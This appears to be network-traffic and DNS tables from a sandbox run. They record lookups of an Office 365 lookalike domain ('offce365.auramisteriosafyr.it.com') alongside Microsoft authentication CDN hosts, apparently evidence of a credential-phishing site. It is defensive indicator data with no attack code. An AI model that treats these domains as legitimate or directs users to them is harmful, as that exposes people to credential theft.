                                                                                        Mar 24, 2025 05:01:32.744352102 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:32.744396925 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:32.744498968 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:32.744703054 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:32.744724035 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:32.942564011 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:32.942934990 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:32.942969084 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:32.943209887 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:32.943217993 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.687463999 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.687616110 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.687697887 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.688955069 CET49771443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.688987017 CET44349771104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.692265987 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.692300081 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.692399979 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.692665100 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.692679882 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.894342899 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.894634962 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.894670010 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:33.894805908 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:33.894812107 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:34.304079056 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:34.304168940 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:34.304342031 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:34.304966927 CET49772443192.168.2.16104.21.59.5
                                                                                        Mar 24, 2025 05:01:34.304989100 CET44349772104.21.59.5192.168.2.16
                                                                                        Mar 24, 2025 05:01:37.141377926 CET49694443192.168.2.1620.190.135.6
                                                                                        Mar 24, 2025 05:01:37.254954100 CET4434969420.190.135.6192.168.2.16
                                                                                        Mar 24, 2025 05:01:37.255084991 CET49694443192.168.2.1620.190.135.6
                                                                                        Mar 24, 2025 05:02:07.406431913 CET49773443192.168.2.16142.250.65.196
                                                                                        Mar 24, 2025 05:02:07.406493902 CET44349773142.250.65.196192.168.2.16
                                                                                        Mar 24, 2025 05:02:07.406588078 CET49773443192.168.2.16142.250.65.196
                                                                                        Mar 24, 2025 05:02:07.406882048 CET49773443192.168.2.16142.250.65.196
                                                                                        Mar 24, 2025 05:02:07.406903982 CET44349773142.250.65.196192.168.2.16
                                                                                        Mar 24, 2025 05:02:07.595103979 CET44349773142.250.65.196192.168.2.16
                                                                                        Mar 24, 2025 05:02:07.595503092 CET49773443192.168.2.16142.250.65.196
                                                                                        Mar 24, 2025 05:02:07.595524073 CET44349773142.250.65.196192.168.2.16
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 24, 2025 05:00:02.655350924 CET53591701.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:02.712394953 CET53517311.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:03.409418106 CET53653951.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:03.544050932 CET53558851.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:03.617862940 CET4996953192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:03.618350029 CET5305653192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:03.727586985 CET53499691.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:03.750117064 CET53530561.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:04.358031988 CET5964753192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:04.358180046 CET6314053192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:04.358414888 CET5060353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:04.358530998 CET5934353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:04.454621077 CET53506031.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:04.455149889 CET53593431.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:04.455750942 CET53631401.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:04.455965042 CET53596471.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:05.388334990 CET5368053192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:05.388478041 CET5504153192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:05.485131025 CET53550411.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:05.485811949 CET53536801.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:06.445240021 CET6315953192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:06.445420980 CET5350553192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:06.543057919 CET53535051.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:06.544786930 CET53631591.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:07.007966042 CET5155853192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:07.008132935 CET6031753192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:07.105241060 CET53603171.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:07.105268955 CET53515581.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:07.288834095 CET5543453192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:07.289033890 CET5727353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:07.385165930 CET53554341.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:07.385921001 CET53572731.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:20.465342045 CET53613311.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.271663904 CET5038253192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.272016048 CET5392553192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.273884058 CET5759753192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.274107933 CET5774653192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.274499893 CET5484553192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.274754047 CET6537953192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.276443958 CET5398353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.276617050 CET5079853192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.277209044 CET6220853192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.277352095 CET4966853192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:22.369216919 CET53503821.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.369306087 CET53539251.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.370342016 CET53575971.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.370733023 CET53577461.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.370903969 CET53548451.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.372576952 CET53653791.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.372808933 CET53507981.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.372824907 CET53594331.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.372860909 CET53539831.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:22.829104900 CET53622081.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:23.158989906 CET53496681.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:25.818276882 CET5699653192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:25.818459988 CET6215053192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:25.819340944 CET5694253192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:25.819474936 CET5559753192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:25.917494059 CET53569421.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:25.919631004 CET53555971.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:25.925971985 CET53569961.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:25.925990105 CET53621501.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:26.491283894 CET6076853192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:26.491679907 CET5691153192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:26.589937925 CET53569111.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:26.590179920 CET53607681.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:31.452385902 CET5679053192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:31.452532053 CET6540353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:31.566663980 CET53567901.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:31.591698885 CET53654031.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:34.474746943 CET5495453192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:34.474977970 CET5043153192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:34.573278904 CET53504311.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:34.573322058 CET53549541.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:34.678008080 CET53562971.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:34.997482061 CET5678353192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:34.997849941 CET5897553192.168.2.161.1.1.1
                                                                                        Mar 24, 2025 05:00:35.095254898 CET53589751.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:35.095519066 CET53567831.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:39.485088110 CET53618121.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:00:43.270190001 CET53648251.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:01:01.869440079 CET53632771.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:01:02.565129995 CET53510301.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:01:05.727699995 CET53587921.1.1.1192.168.2.16
                                                                                        Mar 24, 2025 05:01:14.035068989 CET138138192.168.2.16192.168.2.255
                                                                                        Mar 24, 2025 05:01:32.278052092 CET53646991.1.1.1192.168.2.16
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Mar 24, 2025 05:00:23.159066916 CET192.168.2.161.1.1.1c24d(Port unreachable)Destination Unreachable
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Mar 24, 2025 05:00:03.617862940 CET192.168.2.161.1.1.10x9c3eStandard query (0)offce365.auramisteriosafyr.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:03.618350029 CET192.168.2.161.1.1.10xcd68Standard query (0)offce365.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.358031988 CET192.168.2.161.1.1.10xe848Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.358180046 CET192.168.2.161.1.1.10xe714Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.358414888 CET192.168.2.161.1.1.10x42e0Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.358530998 CET192.168.2.161.1.1.10xff05Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:05.388334990 CET192.168.2.161.1.1.10xb2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:05.388478041 CET192.168.2.161.1.1.10x1568Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:06.445240021 CET192.168.2.161.1.1.10x4b48Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:06.445420980 CET192.168.2.161.1.1.10xd6c4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.007966042 CET192.168.2.161.1.1.10x625eStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.008132935 CET192.168.2.161.1.1.10x27a6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.288834095 CET192.168.2.161.1.1.10x42b2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.289033890 CET192.168.2.161.1.1.10x2605Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.271663904 CET192.168.2.161.1.1.10xc849Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.272016048 CET192.168.2.161.1.1.10x193eStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.273884058 CET192.168.2.161.1.1.10x3adaStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.274107933 CET192.168.2.161.1.1.10xd6b0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.274499893 CET192.168.2.161.1.1.10xaf32Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.274754047 CET192.168.2.161.1.1.10x5ddeStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.276443958 CET192.168.2.161.1.1.10xdc3cStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.276617050 CET192.168.2.161.1.1.10x220Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.277209044 CET192.168.2.161.1.1.10x95acStandard query (0)6013971728-1317754460.cos.ap-bangkok.myqcloud.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.277352095 CET192.168.2.161.1.1.10x64a3Standard query (0)6013971728-1317754460.cos.ap-bangkok.myqcloud.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.818276882 CET192.168.2.161.1.1.10x1549Standard query (0)ydpj.auramisteriosafyr.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.818459988 CET192.168.2.161.1.1.10x43f8Standard query (0)ydpj.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.819340944 CET192.168.2.161.1.1.10x5cfcStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.819474936 CET192.168.2.161.1.1.10x5b20Standard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.491283894 CET192.168.2.161.1.1.10x3f47Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.491679907 CET192.168.2.161.1.1.10x91efStandard query (0)res.cloudinary.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:31.452385902 CET192.168.2.161.1.1.10xee7fStandard query (0)ydpj.auramisteriosafyr.it.comA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:31.452532053 CET192.168.2.161.1.1.10xfd63Standard query (0)ydpj.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.474746943 CET192.168.2.161.1.1.10x3fb6Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.474977970 CET192.168.2.161.1.1.10xf332Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.997482061 CET192.168.2.161.1.1.10xee4fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.997849941 CET192.168.2.161.1.1.10xaae6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Mar 24, 2025 05:00:03.727586985 CET1.1.1.1192.168.2.160x9c3eNo error (0)offce365.auramisteriosafyr.it.com172.67.210.168A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:03.727586985 CET1.1.1.1192.168.2.160x9c3eNo error (0)offce365.auramisteriosafyr.it.com104.21.59.5A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:03.750117064 CET1.1.1.1192.168.2.160xcd68No error (0)offce365.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.454621077 CET1.1.1.1192.168.2.160x42e0No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.454621077 CET1.1.1.1192.168.2.160x42e0No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.454621077 CET1.1.1.1192.168.2.160x42e0No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.454621077 CET1.1.1.1192.168.2.160x42e0No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.454621077 CET1.1.1.1192.168.2.160x42e0No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.455149889 CET1.1.1.1192.168.2.160xff05No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.455750942 CET1.1.1.1192.168.2.160xe714No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.455965042 CET1.1.1.1192.168.2.160xe848No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:04.455965042 CET1.1.1.1192.168.2.160xe848No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:05.485131025 CET1.1.1.1192.168.2.160x1568No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:05.485811949 CET1.1.1.1192.168.2.160xb2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:05.485811949 CET1.1.1.1192.168.2.160xb2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:06.543057919 CET1.1.1.1192.168.2.160xd6c4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:06.544786930 CET1.1.1.1192.168.2.160x4b48No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:06.544786930 CET1.1.1.1192.168.2.160x4b48No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.105268955 CET1.1.1.1192.168.2.160x625eNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.385165930 CET1.1.1.1192.168.2.160x42b2No error (0)www.google.com142.250.65.196A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:07.385921001 CET1.1.1.1192.168.2.160x2605No error (0)www.google.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.369216919 CET1.1.1.1192.168.2.160xc849No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.369216919 CET1.1.1.1192.168.2.160xc849No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.369216919 CET1.1.1.1192.168.2.160xc849No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.369216919 CET1.1.1.1192.168.2.160xc849No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.370342016 CET1.1.1.1192.168.2.160x3adaNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.370342016 CET1.1.1.1192.168.2.160x3adaNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.370733023 CET1.1.1.1192.168.2.160xd6b0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.370903969 CET1.1.1.1192.168.2.160xaf32No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.370903969 CET1.1.1.1192.168.2.160xaf32No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.372576952 CET1.1.1.1192.168.2.160x5ddeNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.372808933 CET1.1.1.1192.168.2.160x220No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.372860909 CET1.1.1.1192.168.2.160xdc3cNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.372860909 CET1.1.1.1192.168.2.160xdc3cNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.829104900 CET1.1.1.1192.168.2.160x95acNo error (0)6013971728-1317754460.cos.ap-bangkok.myqcloud.comcos.ap-bangkok.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.829104900 CET1.1.1.1192.168.2.160x95acNo error (0)cos.ap-bangkok.myqcloud.com43.128.193.190A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:22.829104900 CET1.1.1.1192.168.2.160x95acNo error (0)cos.ap-bangkok.myqcloud.com43.128.193.10A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.917494059 CET1.1.1.1192.168.2.160x5cfcNo error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.917494059 CET1.1.1.1192.168.2.160x5cfcNo error (0)ion.cloudinary.com.edgekey.nete1315.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.917494059 CET1.1.1.1192.168.2.160x5cfcNo error (0)e1315.dsca.akamaiedge.net104.77.220.51A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.919631004 CET1.1.1.1192.168.2.160x5b20No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.919631004 CET1.1.1.1192.168.2.160x5b20No error (0)ion.cloudinary.com.edgekey.nete1315.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.925971985 CET1.1.1.1192.168.2.160x1549No error (0)ydpj.auramisteriosafyr.it.com104.21.59.5A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.925971985 CET1.1.1.1192.168.2.160x1549No error (0)ydpj.auramisteriosafyr.it.com172.67.210.168A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:25.925990105 CET1.1.1.1192.168.2.160x43f8No error (0)ydpj.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.589937925 CET1.1.1.1192.168.2.160x91efNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.590179920 CET1.1.1.1192.168.2.160x3f47No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.590179920 CET1.1.1.1192.168.2.160x3f47No error (0)ion.cloudinary.com.edgekey.nete1315.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:26.590179920 CET1.1.1.1192.168.2.160x3f47No error (0)e1315.dsca.akamaiedge.net104.77.220.51A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:31.566663980 CET1.1.1.1192.168.2.160xee7fNo error (0)ydpj.auramisteriosafyr.it.com104.21.59.5A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:31.566663980 CET1.1.1.1192.168.2.160xee7fNo error (0)ydpj.auramisteriosafyr.it.com172.67.210.168A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:31.591698885 CET1.1.1.1192.168.2.160xfd63No error (0)ydpj.auramisteriosafyr.it.com65IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573278904 CET1.1.1.1192.168.2.160xf332No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573278904 CET1.1.1.1192.168.2.160xf332No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573278904 CET1.1.1.1192.168.2.160xf332No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573322058 CET1.1.1.1192.168.2.160x3fb6No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573322058 CET1.1.1.1192.168.2.160x3fb6No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573322058 CET1.1.1.1192.168.2.160x3fb6No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573322058 CET1.1.1.1192.168.2.160x3fb6No error (0)e329293.dscd.akamaiedge.net23.209.72.9A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.573322058 CET1.1.1.1192.168.2.160x3fb6No error (0)e329293.dscd.akamaiedge.net23.209.72.31A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.595026016 CET1.1.1.1192.168.2.160x5beaNo error (0)shed.dual-low.s-part-0010.t-0009.t-msedge.nets-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:34.595026016 CET1.1.1.1192.168.2.160x5beaNo error (0)s-part-0010.t-0009.t-msedge.net13.107.246.38A (IP address)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:35.095254898 CET1.1.1.1192.168.2.160xaae6No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:35.095254898 CET1.1.1.1192.168.2.160xaae6No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:35.095254898 CET1.1.1.1192.168.2.160xaae6No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:35.095519066 CET1.1.1.1192.168.2.160xee4fNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Mar 24, 2025 05:00:35.095519066 CET1.1.1.1192.168.2.160xee4fNo error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
